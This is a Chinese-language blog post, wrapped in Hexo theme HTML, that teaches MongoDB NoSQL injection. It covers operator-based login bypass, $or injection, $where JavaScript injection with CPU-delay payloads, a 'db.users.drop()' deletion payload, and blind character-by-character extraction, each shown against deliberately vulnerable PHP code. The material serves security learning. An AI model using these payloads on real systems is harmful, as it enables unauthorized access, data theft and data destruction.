<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.2" rel="stylesheet" type="text/css">


  <meta name="keywords" content="Hexo, NexT">








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.2">






<meta name="description" content="基础语法">
<meta property="og:type" content="article">
<meta property="og:title" content="Nosql注入">
<meta property="og:url" content="http://yoursite.com/2019/09/12/Nosql注入/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="基础语法">
<meta property="og:locale" content="zh">
<meta property="og:updated_time" content="2019-09-14T08:20:07.777Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Nosql注入">
<meta name="twitter:description" content="基础语法">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/09/12/Nosql注入/">





  <title>Nosql注入 | Hexo</title>
  














</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hexo</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/09/12/Nosql注入/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Nosql注入</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-09-12T21:02:44+08:00">
                2019-09-12
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="基础语法"><a href="#基础语法" class="headerlink" title="基础语法"></a>基础语法</h2><a id="more"></a>

<p>MongoDB为例</p>
<h3 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h3><p>mongodb是以文档的形式来存储数据，文档也是mongodb的最基本的数据组织形式</p>
<p>文档以key:value的形式存在，一个文档可以有多个键值对 键值对的类型不需要一致，</p>
<p>{‘color’:’blue’} 一个键值对</p>
<p>{‘color’:’blue’,</p>
<p> ‘num’:1234,</p>
<p> ‘price’,4321}</p>
<p>多个文档组合成集合，可以这样想，文档是关系数据库中的行，集合就是表，表在组合成库，</p>
<p>key:value ==&gt; 文档 ==&gt; 集合 ==&gt; 数据库</p>
<h3 id="操作符"><a href="#操作符" class="headerlink" title="操作符"></a>操作符</h3><p>$gt   ==&gt;大于</p>
<p>$lt    ==&gt;小于</p>
<p>$gte ==&gt; 大于等于</p>
<p>$lte  ==&gt; 小于等于</p>
<p>$regex ===&gt; 正则表达式</p>
<p>$ne ==&gt;不等于</p>
<p>$eq ==&gt;等于</p>
<p>$where ==&gt;转换js语句 </p>
<p>$in ==&gt; in(在)</p>
<p>$nin ==&gt; not in (不在)</p>
<p>$or ==&gt; or</p>
<h2 id="举个栗子"><a href="#举个栗子" class="headerlink" title="举个栗子"></a>举个栗子</h2><p>查询user表name=admin的记录</p>
<p>db.user.find({‘name’:’admin’});</p>
<p>查询user表中name不等于admin的记录</p>
<p>db.user.find({‘name’:{$ne:’admin’}});</p>
<h2 id="注入方式"><a href="#注入方式" class="headerlink" title="注入方式"></a>注入方式</h2><h3 id="重言式注入"><a href="#重言式注入" class="headerlink" title="重言式注入"></a>重言式注入</h3><p>重言式注入主要是因为他的猪队友php的数组机制，</p>
<p>后台查询语句为</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$data = <span class="keyword">array</span>(</span><br><span class="line"></span><br><span class="line">		<span class="string">'username'</span> =&gt;  $_REQUEST[<span class="string">'username'</span>],</span><br><span class="line"></span><br><span class="line">		<span class="string">'password'</span> =&gt;  $_REQUEST[<span class="string">'password'</span>]</span><br><span class="line"></span><br><span class="line">	);</span><br></pre></td></tr></table></figure>

<p>正常情况下</p>
<p>?username=xx&amp;password=xxx</p>
<p>在php中</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$data = <span class="keyword">array</span>(</span><br><span class="line"></span><br><span class="line">		<span class="string">'username'</span> =&gt;  <span class="string">'xx'</span>,</span><br><span class="line"></span><br><span class="line">		<span class="string">'password'</span> =&gt;  <span class="string">'xxx'</span></span><br><span class="line">);</span><br></pre></td></tr></table></figure>

<p>在mongodb中</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">db.user.find(</span><br><span class="line"></span><br><span class="line">	&#123;</span><br><span class="line">        <span class="string">"username"</span>:<span class="string">'xx'</span>,</span><br><span class="line">        <span class="string">"password"</span>:<span class="string">'xxx'</span></span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">)</span><br></pre></td></tr></table></figure>

<p>当输入username[$ne]=1&amp;password[$ne]=2时，就会产生重言式注入</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">db.user.find(</span><br><span class="line">&#123;</span><br><span class="line">    <span class="string">"username"</span>:&#123;$ne:<span class="string">'1'</span>&#125;,</span><br><span class="line">    <span class="string">"password"</span>:&#123;$ne:<span class="string">'2'</span>&#125;</span><br><span class="line">&#125;</span><br><span class="line">)</span><br></pre></td></tr></table></figure>

<p>等同于查询username不等于1 password不等于2</p>
<h3 id="联合查询注入"><a href="#联合查询注入" class="headerlink" title="联合查询注入"></a>联合查询注入</h3><p>这个简单看一下，现在的mongodb查询要求必须是一个数组，</p>
<p>后台</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">string query =<span class="string">"&#123; username: '"</span> + post_username + <span class="string">"', password: '"</span> + post_password + <span class="string">"' &#125;"</span></span><br></pre></td></tr></table></figure>

<p>payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=guest<span class="string">', $or: [ &#123;&#125;, &#123; '</span>a<span class="string">':'</span>a&amp;password=<span class="string">' &#125; ]</span></span><br></pre></td></tr></table></figure>

<h2 id="JS注入"><a href="#JS注入" class="headerlink" title="JS注入"></a>JS注入</h2><p>$where操作符可以执行js内容</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">  $query_body =<span class="string">"</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">		function q() &#123;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">			var username = "</span>.$_REQUEST[<span class="string">"username"</span>].<span class="string">";</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">			var password = "</span>.$_REQUEST[<span class="string">"password"</span>].<span class="string">";if(username == '1'&amp;&amp;password == '1') return true; else&#123; return false;&#125;&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">"</span>; </span><br><span class="line">$result = $collection-&gt;find(<span class="keyword">array</span>(<span class="string">'$where'</span>=&gt;$query_body));</span><br></pre></td></tr></table></figure>

<p>输入</p>
<p>?username=admin&amp;password=123;return true;</p>
<p>mongodb中</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">db.user.find(</span><br><span class="line">&#123;</span><br><span class="line">    $where:&quot;function q() &#123;var username = 1;&quot;+&quot;var password =1;return true;;if(username==&apos;admin&apos;&amp;&amp;password==&apos;123&apos;)&quot;+</span><br><span class="line">    &quot;return true;else &#123;return flase;&#125;&#125;&quot;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">)</span><br></pre></td></tr></table></figure>

<p>再放几个payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//one</span></span><br><span class="line">username=<span class="number">1</span>&amp;password=<span class="number">1</span>;(<span class="function"><span class="keyword">function</span><span class="params">()</span></span>&#123;<span class="keyword">var</span>%<span class="number">20</span>date%<span class="number">20</span>=%<span class="number">20</span><span class="keyword">new</span>%<span class="number">20</span>Date();%<span class="number">20</span><span class="keyword">do</span>&#123;curDate%<span class="number">20</span>=%<span class="number">20</span><span class="keyword">new</span>%<span class="number">20</span>Date();&#125;<span class="keyword">while</span>(curDate-date%<span class="number">3</span>C5000);%<span class="number">20</span><span class="keyword">return</span>%<span class="number">20</span>Math.max();&#125;)();<span class="comment">//cpu瞬间飙升5秒</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//two</span></span><br><span class="line"></span><br><span class="line">?username=<span class="number">1</span>&amp;password=<span class="number">2</span>;<span class="keyword">var</span> date = <span class="keyword">new</span> Date(); <span class="keyword">var</span> curDate = <span class="keyword">null</span>; <span class="keyword">do</span> &#123; curDate = <span class="keyword">new</span> Date(); &#125; <span class="keyword">while</span>((Math.abs(date.getTime()-curDate.getTime()))/<span class="number">100</span> &lt; <span class="number">20</span>); <span class="keyword">return</span> <span class="keyword">true</span>;&#125;<span class="comment">// 将系统延迟20秒，如果改成while((Math.abs(date.getTime()-curDate.getTime()))/1000 &lt; 20); 则可以导致数据库报错。.</span></span><br></pre></td></tr></table></figure>

<h3 id="commod命令"><a href="#commod命令" class="headerlink" title="commod命令"></a>commod命令</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$manager = <span class="keyword">new</span> MongoDB\Driver\Manager(<span class="string">"mongodb://mongo:27017"</span>);</span><br><span class="line">$username = $_REQUEST[<span class="string">'username'</span>];</span><br><span class="line">$cmd = <span class="keyword">new</span> MongoDB\Driver\Command([</span><br><span class="line"><span class="comment">// build the 'distinct' command</span></span><br><span class="line"><span class="string">'eval'</span>=&gt; <span class="string">"db.users.distinct('username',&#123;'username':'$username'&#125;)"</span></span><br><span class="line">]);</span><br><span class="line">$cursor = $manager-&gt;executeCommand(<span class="string">'test'</span>, $cmd)-&gt;toArray();</span><br><span class="line">var_dump($cursor);</span><br><span class="line">$doc_failed = <span class="keyword">new</span> DOMDocument();</span><br><span class="line">$doc_failed-&gt;loadHTMLFile(<span class="string">"failed.html"</span>);</span><br><span class="line">$doc_succeed = <span class="keyword">new</span> DOMDocument();</span><br><span class="line">$doc_succeed-&gt;loadHTMLFile(<span class="string">"succeed.html"</span>);</span><br><span class="line"><span class="keyword">if</span>(count($cursor)&gt;<span class="number">0</span>)&#123;</span><br><span class="line"><span class="keyword">echo</span> $doc_succeed-&gt;saveHTML();</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line"><span class="keyword">echo</span> $doc_failed-&gt;saveHTML();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>payload</p>
<p>删库</p>
<p>payload:username=2′});db.users.drop();db.user.find({‘username’:’2  </p>
<h3 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$m = <span class="keyword">new</span> MongoClient();</span><br><span class="line">$postedusername = $_REQUEST[<span class="string">'news'</span>];</span><br><span class="line">$db = $m-&gt;test;</span><br><span class="line">$collection = $db-&gt;user;</span><br><span class="line">$function = <span class="string">"function() &#123;if(this.news == '$news') return true&#125;"</span>;</span><br><span class="line"><span class="keyword">echo</span> $function;</span><br><span class="line">$result = $coll-&gt;find(<span class="keyword">array</span>(<span class="string">'$where'</span>=&gt;$function));</span><br><span class="line"><span class="keyword">if</span> ($result-&gt;count()&gt;<span class="number">0</span>) &#123;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'该新闻存在'</span>;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'该新闻不存在'</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>this.news查找user集合中的news，这里有if判断，如果输入一个存在的news返回，新闻存在。输入一个不存在news返回，新闻不存在</p>
<p>输入</p>
<p>?news=123’ || ‘1’== ‘1  ==&gt;function() {if(this.news == ‘123’ || ‘1’== ‘1’) return true}  构造一个条件为真的判断，返回新闻存在  </p>
<p>payload</p>
<p>?news=123’||this.news[0] ==’A   通过返回新闻存在和不存在 判断news的内容</p>
<p>参考链接</p>
<p><a href="https://blog.szfszf.top/tech/nosql%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93mongodb/#i-4" target="_blank" rel="noopener">https://blog.szfszf.top/tech/nosql%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93mongodb/#i-4</a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/09/11/python沙盒逃逸one/" rel="next" title="python沙盒逃逸one">
                <i class="fa fa-chevron-left"></i> python沙盒逃逸one
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/09/13/Lamp-Security-CTF4/" rel="prev" title="Lamp-Security-CTF4">
                Lamp-Security-CTF4 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            Overview
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image" src="/images/avatar.gif" alt="John Doe">
          <p class="site-author-name" itemprop="name">John Doe</p>
           
              <p class="site-description motion-element" itemprop="description"></p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives/">
                <span class="site-state-item-count">22</span>
                <span class="site-state-item-name">posts</span>
              </a>
            </div>
          

          

          

        </nav>

        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#基础语法"><span class="nav-number">1.</span> <span class="nav-text">基础语法</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#简介"><span class="nav-number">1.1.</span> <span class="nav-text">简介</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#操作符"><span class="nav-number">1.2.</span> <span class="nav-text">操作符</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#举个栗子"><span class="nav-number">2.</span> <span class="nav-text">举个栗子</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#注入方式"><span class="nav-number">3.</span> <span class="nav-text">注入方式</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#重言式注入"><span class="nav-number">3.1.</span> <span class="nav-text">重言式注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#联合查询注入"><span class="nav-number">3.2.</span> <span class="nav-text">联合查询注入</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#JS注入"><span class="nav-number">4.</span> <span class="nav-text">JS注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#commod命令"><span class="nav-number">4.1.</span> <span class="nav-text">commod命令</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#盲注"><span class="nav-number">4.2.</span> <span class="nav-text">盲注</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>
</div>


<div class="powered-by">
  Powered by <a class="theme-link" href="https://hexo.io">Hexo</a>
</div>

<div class="theme-info">
  Theme -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Muse
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.2"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.2"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.2"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.2"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.2"></script>



  


  




	





  





  






  





  

  

  

  

  

  

</body>
</html>
